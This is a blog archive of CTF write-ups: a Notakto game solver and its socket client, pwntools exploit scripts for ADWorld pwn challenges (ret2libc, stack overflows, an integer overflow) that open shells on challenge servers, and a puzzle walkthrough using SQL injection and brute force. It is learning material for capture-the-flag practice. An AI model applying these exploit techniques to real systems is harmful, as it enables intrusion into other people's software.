Category archive: Information Security
BJD CTF Programming notakto_1
An obscure challenge from an obscure CTF: a tic-tac-toe-like game for which you have to write a program to decide the moves.
I wrote two programs, shown below:
The C++ one has flaws, but it is good enough:
```cpp
#include <iostream>
#include <algorithm>
using namespace std;

int process[10] = { 4 };   // move sequence; we open in the centre (cell 4)
bool visited[10];          // cells already taken

inline int cal(int x, int y) { return x * 3 + y; }
bool& vis(int x, int y) { return visited[cal(x, y)]; }

// true if the cell (x, y) completes a row, column or diagonal
bool check(int x, int y) {
    bool flag = false;
    flag |= vis(0, y) & vis(1, y) & vis(2, y);
    flag |= vis(x, 0) & vis(x, 1) & vis(x, 2);
    if (x == y) flag |= vis(0, 0) & vis(1, 1) & vis(2, 2);
    if (x + y == 2) flag |= vis(0, 2) & vis(1, 1) & vis(2, 0);
    return flag;
}

// print process[0..n] as one line of the dictionary (situation.txt)
void print(int n) {
    for (int i = 0; i <= n; i++) {
        cout << process[i];
    }
    cout << endl;
}

// enumerate every sequence of non-losing moves; when the side to move
// (odd step = the server) has no safe move left, print the line
void dfs(int step) {
    bool flag = true;
    for (int i = 0; i < 9; i++) {
        if (visited[i]) continue;
        visited[i] = true;
        process[step] = i;
        if (check(i / 3, i % 3) == 0) {
            dfs(step + 1);
            flag = false;
        }
        visited[i] = false;
    }
    if (flag && step % 2 == 1) print(step);
}

int main() {
    visited[4] = true;
    dfs(1);
}
```
The Python one, which also has to send the moves out over a socket, was a real pain:
```python
from pwn import *

sock = remote("222.186.56.247", 8122)
wordList = []
currentWord = ""

def findNewWord():
    # first dictionary line that starts with the moves played so far
    global currentWord, wordList
    for elem in wordList:
        if elem[0:len(currentWord)] == currentWord:
            return elem
    raise Exception("Error:Word Not found!")

def loadDic():
    # situation.txt is the output of the C++ program above
    global wordList
    with open("situation.txt", "r") as f:
        wordList = f.readlines()

def getIntfromSock(sock):
    # read the server's move (a single digit, possibly after a space)
    sock.recvuntil("My move: ")
    x = sock.recv(1)
    if x == b' ':
        x = sock.recv(1)
    return int(x)

def payGame(i):
    global currentWord, wordList, sock
    print("the ith:", i)
    currentWord = ""
    while len(currentWord) < 5:
        backupWord = findNewWord()
        print("Send:", backupWord[len(currentWord)])
        sock.sendline(str(backupWord[len(currentWord)]))
        currentWord += backupWord[len(currentWord)]
        if len(currentWord) == 5:
            print("break")
            break
        currentWord += str(getIntfromSock(sock))
        print("currentWord", currentWord)
    sock.recvuntil("win!")

loadDic()
for i in range(150):
    payGame(i)
sock.interactive()
```
Code link: notakto
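As an added example (not the post's code), here is a C solver that decides the same game on the fly instead of from a pre-generated situation.txt: a move that completes a line loses, and can_win() searches every continuation with memoisation over the 9-bit board. It assumes the cells are numbered 0..8 row by row, matching the post's process[0] = 4 centre opening.

```c
#include <stdio.h>
#include <stdint.h>

/* Board = 9-bit mask, cell i is bit i, numbered 0..8 row by row, so cell 4
 * is the centre (the post's process[0] = 4 opening). Masks are octal. */
static const uint16_t LINES[8] = {
    0007, 0070, 0700,   /* rows      */
    0111, 0222, 0444,   /* columns   */
    0421, 0124          /* diagonals */
};

/* 1 if playing `cell` completes a line; in Notakto that move loses.
 * Boards reached by the search never already contain a full line. */
static int completes_line(uint16_t board, int cell) {
    uint16_t after = board | (1u << cell);
    for (int i = 0; i < 8; i++)
        if ((after & LINES[i]) == LINES[i]) return 1;
    return 0;
}
static int8_t memo[512];   /* 0 unknown, 1 mover wins, -1 mover loses */

/* 1 if the side to move can force the opponent to complete a line. */
int can_win(uint16_t board) {
    if (memo[board]) return memo[board] > 0;
    int result = 0;                    /* no safe move: the mover loses */
    for (int cell = 0; cell < 9 && !result; cell++) {
        if (board & (1u << cell)) continue;              /* occupied */
        if (completes_line(board, cell)) continue;       /* suicidal */
        if (!can_win(board | (1u << cell))) result = 1;  /* opponent loses */
    }
    memo[board] = result ? 1 : -1;
    return result;
}

/* Cell to play: a winning one if any, else any safe one, else -1. */
int best_move(uint16_t board) {
    int safe = -1;
    for (int cell = 0; cell < 9; cell++) {
        if ((board & (1u << cell)) || completes_line(board, cell)) continue;
        if (!can_win(board | (1u << cell))) return cell;
        if (safe < 0) safe = cell;
    }
    return safe;
}
int main(void) {
    printf("empty board: first player %s, play cell %d\n",
           can_win(0) ? "wins" : "loses", best_move(0));
    return 0;
}
```

Driving the socket client with best_move() instead of a dictionary lookup removes the "Word Not found" failure when the server replies with a move the pre-generated lines never anticipated.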
ADWorld Pwn level3
Written entirely by following the write-up, which talked about the PLT and GOT tables. I had touched on that concept a little before but had hardly used it, and I didn't think very hard about it while imitating their code either. Typing it out once now will make it sink in later.
```python
from pwn import *

p = remote("111.198.29.45", 33161)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")

# addresses taken from the binary's PLT, GOT and symbol table
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

# first round: write(1, write_got, 4), then return to main
p.recvuntil(":\n")
payload = b'0' * 0x88 + p32(0) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)

# the 4 leaked bytes are the runtime address of write() in libc
write_got_addr = u32(p.recv(4))
print(hex(write_got_addr))
libc_base = write_got_addr - libc.sym['write']
print(hex(libc_base))
system_addr = libc_base + libc.sym['system']
print(hex(system_addr))
binshaddr = libc_base + 0x15902B   # offset of "/bin/sh" in this libc
print(hex(binshaddr))

# second round: system("/bin/sh")
payload2 = b'0' * 0x88 + p32(0) + p32(system_addr) + p32(0) + p32(binshaddr)
p.recvuntil(":\n")
p.sendline(payload2)
p.interactive()
```
ADWorld Pwn when_did_you_born
```python
from pwn import *

p = remote("111.198.29.45", 36585)
p.sendlineafter("Birth?", "0")
payload = b'0' * 0x8 + p32(1926)
print(len(payload))
p.sendlineafter("Name?", payload)
p.interactive()
```
ADWorld Pwn cgpwn2
Looks like I'm getting the hang of it ^v^
```python
from pwn import *

p = remote("111.198.29.45", 55602)
p.sendlineafter("your name", "/bin/sh")
strAddr = 0x0804A080
sysAddr = 0x08048420
payload = b'0' * (0x26 + 0x4) + p32(sysAddr) + p32(0) + p32(strAddr)
print(len(payload))
p.sendlineafter("here:", payload)
p.interactive()
```
ADWorld Pwn int_overflow
An integer-overflow challenge; I had never done one before, so I read the write-up.
```python
from pwn import *

p = remote("111.198.29.45", 56345)
p.sendlineafter("Your choice:", "1")
p.sendlineafter("username:", "123")
flagAddr = 0x0804868B
# total length 0x105 bytes
payload = b'0' * (0x14 + 0x4) + p32(flagAddr) + b'0' * (0x105 - 0x8 - 0x14)
print(len(payload))
p.sendlineafter("passwd:", payload)
p.interactive()
```
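As an added illustration of the bug class (not the challenge's source, which this page does not show), the narrow-integer length check beside its fixed form: if the byte count is stored in an 8-bit variable, the exploit's 0x105-byte (261-byte) password is recorded as 5 and passes a 3..8 range check. make_input() builds a constructed input of the requested size; the 3..8 range and the 16-byte destination are assumed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed input: n bytes of 'A' in a static buffer (n capped at 1023). */
const char *make_input(size_t n) {
    static char buf[1024];
    if (n >= sizeof buf) n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Vulnerable pattern: the byte count is kept in an 8-bit variable, so
 * strlen() == 0x105 (261) is truncated to 5 and slips through the range
 * check even though 261 bytes are about to be copied. */
int length_ok_narrow(const char *s) {
    uint8_t len = (uint8_t)strlen(s);   /* 261 mod 256 == 5 */
    return len >= 3 && len <= 8;
}

/* Fixed pattern: keep the full size_t and compare before anything narrows it. */
int length_ok_fixed(const char *s) {
    size_t len = strlen(s);
    return len >= 3 && len <= 8;
}

/* Copy into a fixed 16-byte destination only when the real length is in
 * range and fits; returns 1 on success, 0 when the input is rejected. */
int accept_password(const char *s) {
    char dst[16];
    if (!length_ok_fixed(s) || strlen(s) >= sizeof dst) return 0;
    strcpy(dst, s);
    return 1;
}

int main(void) {
    const char *p = make_input(0x105);
    printf("261 bytes: narrow check %d, fixed check %d, accepted %d\n",
           length_ok_narrow(p), length_ok_fixed(p), accept_password(p));
    return 0;
}
```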
ADWorld Pwn guess_num
With some beginner's pointers from the great Imagin, I started doing a bit of PWN for fun when I had nothing to do. I went through the write-ups of two stack-overflow examples to get a feel for it; this is the third challenge, which I did on my own and solved.
The stack overflow overwrites the random seed; write a C program, compile it with gcc, and it generates exactly the same random numbers.
Pwn code:
```python
from pwn import *

p = remote("111.198.29.45", 44610)
payload = bytearray('0' * 0x24, "utf-8")   # overflows into the seed
p.sendline(payload)
p.interactive()
```
2017 Red Envelope Walkthrough
Red envelope URL: http://rb.renjikai.website/2017-redbag1/
rb1: the old trick, inspect the form's hidden element and submit year=2017.
decode_base64(‘u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305’) then appears.
Base64-decoding gives
I only just noticed that I made a mistake: it was supposed to be Base64-decoded, but I forgot to Base64-encode the string……
Converting u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305 directly from Unicode escapes to Chinese (any of the little online tools works, or use Notepad to replace u with \u) gives “恭喜你们通过rb1红包”, which is the Alipay Chinese passphrase.
Viewing the rb1 source reveals the comment small hint for rb2:sql injection, which makes rb2's goal clear: SQL injection.
rb2: SQL injection. Enter both the username and the password and the Alipay red-envelope passphrase comes out as translate_to_chinese(“congratulation”)+”C2AEE99934″; translate_to_chinese(“congratulation”) is “恭喜”, so “恭喜”+”C2AEE99934″=“恭喜C2AEE99934″ is the Alipay Chinese passphrase.
rb3: a new trick, brute force.
The HTML source contains the comment guess is a 4-digit postive number, so a script that POSTs every value from 1000 to 9999 does the job; the number turns out to be 5716 and the output is the numeric passphrase 88281030.
The page has since been moved to http://rb.renjikai.website/2017-redbag1/ (long since taken offline); anyone interested can try it later, and the source code will be published later.
Source code download: https://pan.renjikai.com/Bucket/2017-redbag1.zip
ISCC 2016 WriteUp Collection
Just a few links below:
ISCC 2016 reverse-engineering writeup – GlodsNow's blog – Blog channel – CSDN http://blog.csdn.net/glodsnow/article/details/51497679
ISCC 2016 WEB WRITEUP – P@SSw0@d!!'s journal – NetEase Blog http://blog.163.com/passw0a_d/blog/static/250807061201643072655863/
2016 ISCC CTF competition BASE: chicken soup for the soul http://blog.csdn.net/aj_shang/article/details/51612934
ISCC 2016 wirteup -Basic http://blog.sina.com.cn/s/blog_ab9229c10102webi.html
iscc2016 pwn section writeup http://www.zhimengzhe.com/linux/57136.html